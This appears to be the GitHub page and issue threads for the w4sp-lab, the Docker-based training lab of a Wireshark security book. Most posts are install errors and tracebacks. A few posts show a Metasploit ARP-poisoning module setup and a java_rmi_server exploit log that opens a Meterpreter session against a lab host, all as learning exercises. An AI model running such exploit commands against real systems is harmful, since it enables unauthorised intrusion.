Lab environment for the Wireshark for Security Professionals book
Home Page: https://github.com/w4sp-book/w4sp-lab/wiki/Lab-Installation
This is the lab environment for the Wireshark for Security Professionals book. The lab is built on top of Docker and Kali Linux and provides a realistic network with numerous services useful for learning security fundamentals with Wireshark.
Both Kali and the w4sp-lab are moving targets and are subject to change. Always refer to the wiki for the most recent information regarding working with the lab.
The book states that the lua scripts are located but here. However, they don't seem to be available.
Hi,
When I try to run the lua script using graphviz I get the following error:
w4sp-lab@w4sp:~$ tshark -q -X lua_script:graphviz.lua
tshark: Lua: Error during loading:
[string "graphviz.lua"]:2: module 'gv' not found:
no field package.preload['gv']
no file '/gv.lua'
no file '/home/w4sp-lab/.config/wireshark/plugins/gv.lua'
no file '/usr/lib/x86_64-linux-gnu/wireshark/plugins/2.4.2/gv.lua'
no file '/usr/local/share/lua/5.2/gv.lua'
no file '/usr/local/share/lua/5.2/gv/init.lua'
no file '/usr/local/lib/lua/5.2/gv.lua'
no file '/usr/local/lib/lua/5.2/gv/init.lua'
no file '/usr/share/lua/5.2/gv.lua'
no file '/usr/share/lua/5.2/gv/init.lua'
no file './gv.lua'
no file '/usr/local/lib/lua/5.2/gv.so'
no file '/usr/lib/x86_64-linux-gnu/lua/5.2/gv.so'
no file '/usr/lib/lua/5.2/gv.so'
no file '/usr/local/lib/lua/5.2/loadall.so'
no file './gv.so'
Capturing on 'any'
Thank you,
Mike
I seem to be missing the sploitable image.
['docker', 'run', '-id', '--privileged', '--name', 'sploit', '--hostname', 'sploit', '--net=none', 'w4sp/labs:sploitable']
Unable to find image 'w4sp/labs:sploitable' locally
Here is what I did
I've been looking at this on and off for a week, making sure I have the right IP addresses in each slot (as far as I can tell) and I get the same results each time. Am I missing a step?
Here are the settings
Basic options:
Name Current Setting Required Description
AUTO_ADD false yes Auto add new host when discovered by the listener
BIDIRECTIONAL false yes Spoof also the source with the dest
DHOSTS 192.100.200.160 yes Target ip addresses
INTERFACE no The name of the interface
LISTENER true yes Use an additional thread that will listen for arp requests to reply as fast as possible
SHOSTS 192.100.200.1 yes Spoofed ip addresses
SMAC no The spoofed mac
I have the lab all set up - and as Chapter 4 page 134 states and expects when starting Wireshark - I had the error:
'couldn't run /usr/bin dumpcap in child process permission denied`
The remedy listed on page 134 has a typo - it says:
sudo setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /user/bin/dumpcap
of course that throws an error - the folder is: /usr/bin/ not: /user/bin
So I ran the command as the folder should be with /usr/bin/dumpcap
Double checking - there is no user/bin created in the labs.. so the call should be to /usr/bin/.
But then when I went to start Wireshark I get the same error - tried running it before and after opening Wireshark is loaded so I can't do the labs.
Anybody run into this or have a suggestion. Looks like somebody put a lot of work into this - hate to see it wasted effort... on their part and mine - already read the whole book . Loved it - but frustrated and disappointed I can't get to run the promising labs and run Wireshark at the same time.... kind of funny since it is a book about Wireshark
First Off, Love the book and lab!
So throwing the ARP aux.poisoning result in the error of Msf::OptionVaildateError etc etc RHOSTS
I know the RHOSTS should be set. It's not explained in the book.
Also the IP address discovery of ping vic1.lab doesn't resolve for me.
additional thought: I know the IP add can be discovered by the GUI with a mouse however vic1 isn't discovered through enumeration. How would i gather the exist of vic1.lab without the GUI? i wouldn't know to ping vic1.lab either.
I'm sure the solution to my problem is a google search away with the whole RHOSTS thing.
I'm assume the target address range = RHOSTS (should be obvious 10.0.0.0/24, but i self-doubt) ;(
When launching wireshark for the first time in Kali, I get an error message listed above.
running sudo gpasswd -a $USER wireshark in a terminal fixed the issue.
Is this the preferred method?
To those who cannot install the lab, can I suggest you consider leaving negative feedback on Amazon. I cannot make use of this book while the lab does not work and the writers/publishers do not seem to be in any hurry to fix this. Maybe multiple negative reviews on Amazon is the encouragement they need.
Il pacchetto "docker-engine" non ha candidati da installare
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 216, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 394, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
w4sp-lab@kali:~/Downloads/w4sp-lab-master$
Howdy!
I've been following the instructions on the wiki page as of 8/12/2017 (versus whats written in the book) and am receiving the following error when I run the command "sudo python w4sp_webapp.py" as w4sp-lab user. Any ideas what the problem might be?
After starting the webapp.py the network switches to bridged network access with the docker0. I think this is also blocking the network? Anytime I ping a machine I get the Network is Unreachable reply in the command line.
Hi,
I had trouble when installing lab. It happens at end of the installation.
Hi,
I'm currently working through Chapter 6 and reached page 182. It mentions logging into Metasploitable VM with msfadmin/msfadmin credentials however I'm not sure how to connect to this VM. I've tried telnet and SSH but connections refused. Apologies if it is obvious !!
BTW great book and lab. Really enjoying working through the exercises.
Thanks & Best Regards,
Mike
I bought a book and followed 'w4sp-lab'. However, clicking the installer will result in an error. I live in Korea and I can not speak English. Please explain easily.
The first works fine, but the second time you run, an error occurs.
Thanks so much for this lab and the book! ;-)
On the lab install, I am getting this error. (see below)
I'm reading the book and I really want this lab to work!
P.S. I read through the other errors, but didn't see this one. Apologies if I missed it.
Begin Error Text***************************************************
[*] Not enough w4sp/labs images found, building now
/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
The command '/bin/sh -c apt-get install -y suricata logstash openjdk-7-jre-headless' returned a non-zero code: 100
Traceback (most recent call last):
File "w4sp_webapp.py", line 499, in
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 223, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']' returned non-zero exit status 100
Hi,
I've done the following
root@w4sp:~/Desktop# export SSLKEYLOGFILE='/root/Desktop/session.log' (tried /root first)
In same shell
root@w4sp:~/Desktop# open firefox https://wikipedia.org
No file created.
Tried creating a file first
root@w4sp:~/Desktop# nano session.log
root@w4sp:~/Desktop# chmod -R 777 session.log
Nothing written to file.
Are there any other changes needed in Firefox ?
Thank you.
Mike
Help me Please.
w4sp-lab@kali:~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
['which', 'dumpcap']
Traceback (most recent call last):
File "w4sp_webapp.py", line 441, in
w4sp.check_dumpcap()
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 13, in check_dumpcap
dumpcap = r('which dumpcap').strip()
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 223, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['which', 'dumpcap']' returned non-zero exit status 1
I don't execute w4sp_webap.py
what should I do?
Bought the book and trying to install the lab. Errors galore.
I'm clearly not the only person with problems - frustrated at wasting time trying to get a lab to work on an ISO when I'd prefer to spend my time studying, rather than troubleshooting/fixing.
Not having a pop at the helpful people who try to offer good advice in forums for the benefit of their peers. I do, however, feel let down by the book's writers and publishers. If this is all so problematic, why don't you just develop your own static ISO with all included, that actually works? Or provide the pcaps for download?
I'm not able to run the java_rmi_server exploit successfully, each time, I get a message "Meterpreter session X closed. Reason: Died"
Looking at the wireshark traces on port 4444 and using (follow>tcp stream), I see what appears to be the staging jar files being sent, and then the connection starts to show a few [psh,ack] and then [rst,ack]. Does this show the meterpreter dying?
Regardless, is there something I can do to get this exploit to work?
===============================
Wireshark Captures
java_rmi_server.zip
java_rmi_server.port4444.zip
===============================
Metasploit console
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set RHOST 10.100.200.138
RHOST => 10.100.200.138
msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/bind_tcp
PAYLOAD => java/meterpreter/bind_tcp
msf exploit(java_rmi_server) > exploit[] Started bind handler
[] 10.100.200.138:1099 - Using URL: http://0.0.0.0:8080/F2PdPb
[] 10.100.200.138:1099 - Local IP: http://192.100.200.166:8080/F2PdPb
[] 10.100.200.138:1099 - Server started.
[] 10.100.200.138:1099 - Sending RMI Header...
[] 10.100.200.138:1099 - Sending RMI Call...
[] 10.100.200.138:1099 - Replied to request for payload JAR
[] Sending stage (49645 bytes) to 10.100.200.138
[] Meterpreter session 1 opened (192.100.200.166:43545 -> 10.100.200.138:4444) at 2017-05-01 20:54:21 -0500
[] 10.100.200.138 - Meterpreter session 1 closed. Reason: Died
[-] 10.100.200.138:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP >Server didn't get a payload request
[] 10.100.200.138:1099 - Server stopped.
[] Exploit completed, but no session was created.
msf exploit(java_rmi_server) >
[-] Meterpreter session 1 is not valid and will be closed
I am using the below command and still getting error "returned a non-zero code" (see attached).
sudo python w4sp_webapp.py
Kindly help. I am stuck.Thank you!
Lab fails to setup. It gets most of the way before it encounters a (presumably) fatal error and stops.
Exception happened during processing of request from ('127.0.0.1', 52164) Traceback (most recent call last): File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__ self.finish() File "/usr/lib/python2.7/SocketServer.py", line 713, in finish self.wfile.close() File "/usr/lib/python2.7/socket.py", line 283, in close self.flush() File "/usr/lib/python2.7/socket.py", line 307, in flush self._sock.sendall(view[write_offset:write_offset+buffer_size]) error: [Errno 32] Broken pipe
Assuming with the "broken pipe" there's some issue with the connection being closed.
Hi,
I am trying to install on latest VM of Kali i.e. 2017.3. And receiving following error.
any advise ???
Fetched 31.3 MB in 1min 25s (365 kB/s)
E: Failed to fetch http://kali.mirror.garr.it/mirrors/kali/pool/main/a/aufs/aufs-dkms_4.13+20171002-1_amd64.deb Connection failed [IP: 90.147.164.69 80]
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 212, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 390, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1025, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
Command correction on PG 51. To get the lab installed make sure you use sudo .
Old command
python w4sp_webapp.py
Correct command
sudo python w4sp_webapp.py
FALSE ENTRY - SQUID PROXY BLOCKING TRAFFIC - APOLOGIES.
I've been getting this error.
~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
Traceback (most recent call last):
File "w4sp_webapp.py", line 435, in
if os.getlogin() != 'w4sp-lab':
OSError: [Errno 2] No such file or directory
Not sure why. Any help
I am running the latest Kali linux. I have also updated and upgraded the kali linux
Hi,
When running sploit and ELK together should the ELK machine log any traffic to/from the sploit target machine ? I'm not seeing any traffic to/from the sploit IP address when I search the logs in Kibana.
Thank you.
Mike
Not sure whats going on but I received a really long error. There was more to it but I'm just posting the end part. I hope someone is able to help me with this. Thank you in advance.
Hi,
Metasploitable not starting.
I now get the following error:
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'run', '-id', '--privileged', '--name', 'sploit', '--hostname', 'sploit', '--net=none', 'w4sp/labs:sploitable']' returned non-zero exit status 125
Exception AttributeError: "'container' object has no attribute 'id'" in <bound method container.del of <w4sp_app.container.container object at 0x7f9708992a90>> ignored
127.0.0.1 - - [14/Jan/2018 09:36:33] "GET /sploit HTTP/1.1" 500 -
Sploit doesn't appear in network diagram.
Thanks,
Mike
I get this error when loading Docker:
Today, apt-get install netifaces fails.
It seems that apt-get cannot find python-netifaces anymore.
So, I was wondering. Is it worth to keep the code below?
w4sp_app/container.py:22: subprocess.check_call(['apt-get', 'install', 'python-netifaces'])
w4sp_app/container.py:23: import netifaces
I mean, the only reason to keep this code is to catch an error from pip install.
If pip install fails, this one will stop the installation script. Which is good.
I think I'll change this code a little bit.
I'm running:
Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 GNU/Linux
E: Impossibile impostare il blocco /var/lib/dpkg/lock-frontend - open (11: Risorsa temporaneamente non disponibile)
E: Impossibile acquisire il blocco sul frontend dpkg (/var/lib/dpkg/lock-frontend). Un altro processo potrebbe tenerlo occupato.
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 216, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 394, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
Hello. So, I have a strange issue. I can get through the install no problem and the lab environment works just fine. I install, hit setup, refresh the screen and things seems to work find. However, I then shutdown via the browser GUI and that seems to work. Something that is odd though is that the terminal fails to return to the prompt. Thus, I have tried to either hit ctrl-c or just X the terminal out.
Upon reboot or starting the Kali VM the lab will no longer work. I get the browser GUI but when I hit setup something happens and the button that used to be labeled "setup" becomes "error" and there is nothing I can do about it. Hitting the error button quickly flashes an error window that pops up and disappears faster than I can read the message and the terminal cycles through some code but there is no way to work the lab. My only option is to go to the previous VM snapshot that I made prior to installing the lab and reinstall the lab. Then again, I can use the lab. If this didn't take 15 minutes each time it wouldn't be that big of a deal but it does and makes things a huge pain.
Here is the terminal window upon restart of the program when I start getting errors. Hopefully you can help me out!!! Thanks.
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Not enough w4sp/labs images found, building now
/root/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
['docker', 'build', '-t', 'w4sp/labs:ftp_tel', 'ftp_tel']
['docker', 'build', '-t', 'w4sp/labs:inet', 'inet']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
[*] Lab Launched, Starting Browser
[*] Do not close this terminal. Closing Terminal will terminate lab.
127.0.0.1 - - [26/Sep/2017 11:04:56] "GET / HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>docker0 : 172.17.0.1 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /is_ips HTTP/1.1" 404 -
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /favicon.ico HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
Job for docker.service failed.
See "systemctl status docker.service" and "journalctl -xe" for details.
Traceback (most recent call last):
File "w4sp_webapp.py", line 163, in setup
w4sp.setup_network2('eth0')
File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
docker_clean()
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 148, in docker_clean
r('service docker restart')
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['service', 'docker', 'restart']' returned non-zero exit status 1
127.0.0.1 - - [26/Sep/2017 11:05:07] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:07] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:08] "GET /is_ips HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Did not shutdown cleanly, trying again
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
Traceback (most recent call last):
File "w4sp_webapp.py", line 163, in setup
w4sp.setup_network2('eth0')
File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
docker_clean()
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 114, in docker_clean
out = r('docker ps -aq --filter label=w4sp=true').split('\n')[:-1]
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']' returned non-zero exit status 1
127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /is_ips HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Did not shutdown cleanly, trying again
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
Traceback (most recent call last):
File "w4sp_webapp.py", line 163, in setup
w4sp.setup_network2('eth0')
File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
docker_clean()
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 114, in docker_clean
out = r('docker ps -aq --filter label=w4sp=true').split('\n')[:-1]
File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']' returned non-zero exit status 1
127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /is_ips HTTP/1.1" 404 -
The Lab was working fine after initial setup in Chapter 2, but when I went to use it again in Chapter 5, I get the error below.
DETAILS: When I boot the VM, I was prompted to update Virtualbox -- so I did. Since, I've also ran the Kali update as per the setup instructions on this site [sudo apt-get update && sudo apt-get dist-upgrade]. But I'm still get the same error.
The syntax of the failing command seems OK to me. I have no problem manually downloading and opening the public key file [https://packages.elastic.co/GPG-KEY-elasticsearch] in the text editor. In-fact, I can manually run the entire command without error.
w4sp-lab@W4SP:~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[] Caps set correctly on dumpcap
[] Not enough w4sp/labs images found, building now
/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
The command '/bin/sh -c wget -qO - https://packages.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -' returned a non-zero code: 2
Traceback (most recent call last):
File "w4sp_webapp.py", line 499, in
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']' returned non-zero exit status 2
Hi team,
As per the lab manual, the python script should run in w4sp-lab user. But in my case it is asking to run the script in root.
Please update me, that how i can proceed further
w4sp-lab@kali:/root/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
Get:1 https://apt.dockerproject.org/repo debian-stretch InRelease [48.7 kB]
Err:1 https://apt.dockerproject.org/repo debian-stretch InRelease
The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
Hit:2 http://mirrors.neusoft.edu.cn/kali kali-rolling InRelease
Reading package lists... Done
W: GPG error: https://apt.dockerproject.org/repo debian-stretch InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
E: The repository 'https://apt.dockerproject.org/repo debian-stretch InRelease' is not signed.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
Reading package lists... Done
Building dependency tree
Reading state information... Done
apt-transport-https is already the newest version (1.5~rc4).
bridge-utils is already the newest version (1.5-14).
ca-certificates is already the newest version (20170717).
software-properties-common is already the newest version (0.96.20.2-1).
0 upgraded, 0 newly installed, 0 to remove and 1411 not upgraded.
Get:1 https://apt.dockerproject.org/repo debian-stretch InRelease [48.7 kB]
Err:1 https://apt.dockerproject.org/repo debian-stretch InRelease
The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
Hit:2 http://mirrors.neusoft.edu.cn/kali kali-rolling InRelease
Reading package lists... Done
W: GPG error: https://apt.dockerproject.org/repo debian-stretch InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
E: The repository 'https://apt.dockerproject.org/repo debian-stretch InRelease' is not signed.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
aufs-dkms aufs-tools cgroupfs-mount dkms linux-compiler-gcc-6-x86 linux-headers-4.12.0-kali2-amd64
linux-headers-4.12.0-kali2-common linux-headers-amd64 linux-kbuild-4.12
Suggested packages:
aufs-dev python3-apport
The following NEW packages will be installed:
aufs-dkms aufs-tools cgroupfs-mount dkms docker-engine linux-compiler-gcc-6-x86
linux-headers-4.12.0-kali2-amd64 linux-headers-4.12.0-kali2-common linux-headers-amd64 linux-kbuild-4.12
0 upgraded, 10 newly installed, 0 to remove and 1411 not upgraded.
Need to get 31.4 MB of archives.
After this operation, 165 MB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
docker-engine
E: There were unauthenticated packages and -y was used without --allow-unauthenticated
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 212, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 390, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1024, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
w4sp-lab@kali:/root/Downloads/w4sp-lab-master$
How can I add new machines from the docker store to the lab?
Steps to recreate
Expected Results
Actual Results
Workarounds
Notes
Running Kali Linux on my Mac through VirtualBox and installing the lab for a college class. Been beating my head off the wall all week trying to get past the different errors I encounter. I can open the browser and try to setup the lab manually by entering the IP address into firefox but it never goes anywhere.
I'm reading through the book and have found a couple points where I wasn't clear. I'm adding in my assumptions, so any confirmation or correction of these would be appreciated. (BTW, I'm super-stoked about these lab exercises :) )
Ch4. p122 "To show only the NT Create commands, you can use the smb.cmd filter.'
One difficulty I have is determining the specific filter to use based on the specific information I see in
wireshark. If you have an smb sample and you look at an smb packet with the NT Create command,
there is nothing in wireshark that gives you a direct mapping to say 'use the smb.cmd filter'.
One tip is that if you right-click on the smb part of the packet, you'll see 'Filter Field Reference'.
Selecting that will bring up a browser window showing you all the fields for that protocol to add to
your filter. It's not a direct mapping, but it does narrow down the search a bit.
Ch5. p132. "To demonstrate ARP in use, let's ping a host on the network..."
You'll want to double-click the 'inet' node from the browser showing the network diagram before
doing this work. This will bring up a terminal window to the right source host and wireshark to
capture the traffic.
I'll post other things that I've run across here as I find them. Any comments on whether my assumptions are correct would be appreciated. :) (Did I mention I love these labs? 👍 )
Hi, i´m on Chapter 7. In this section, i will a connection to ftp1 with TLSv2 - i start wireshark but i see only connection with TLSv1
who is my failure ?
I've installed the w4sp lab and while the lab pages comes up clicking setup after several hours nothing happens.
Any suggestions on how to fix the issue?
sudo python w4sp_webapp.py
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[] Caps set correctly on dumpcap
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[] Not enough w4sp/labs images found, building now
/root/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:inet', 'inet']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:ftp_tel', 'ftp_tel']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
^C
Session terminated, terminating shell...Traceback (most recent call last):
File "w4sp_webapp.py", line 530, in
subprocess.call(['su', '-', 'w4sp-lab', '-c', 'firefox 127.0.0.1:5000'])
File "/usr/lib/python2.7/subprocess.py", line 168, in call
return Popen(*popenargs, **kwargs).wait()
File "/usr/lib/python2.7/subprocess.py", line 1073, in wait
pid, sts = _eintr_retry_call(os.waitpid, self.pid, 0)
File "/usr/lib/python2.7/subprocess.py", line 121, in _eintr_retry_call
return func(*args)
KeyboardInterrupt
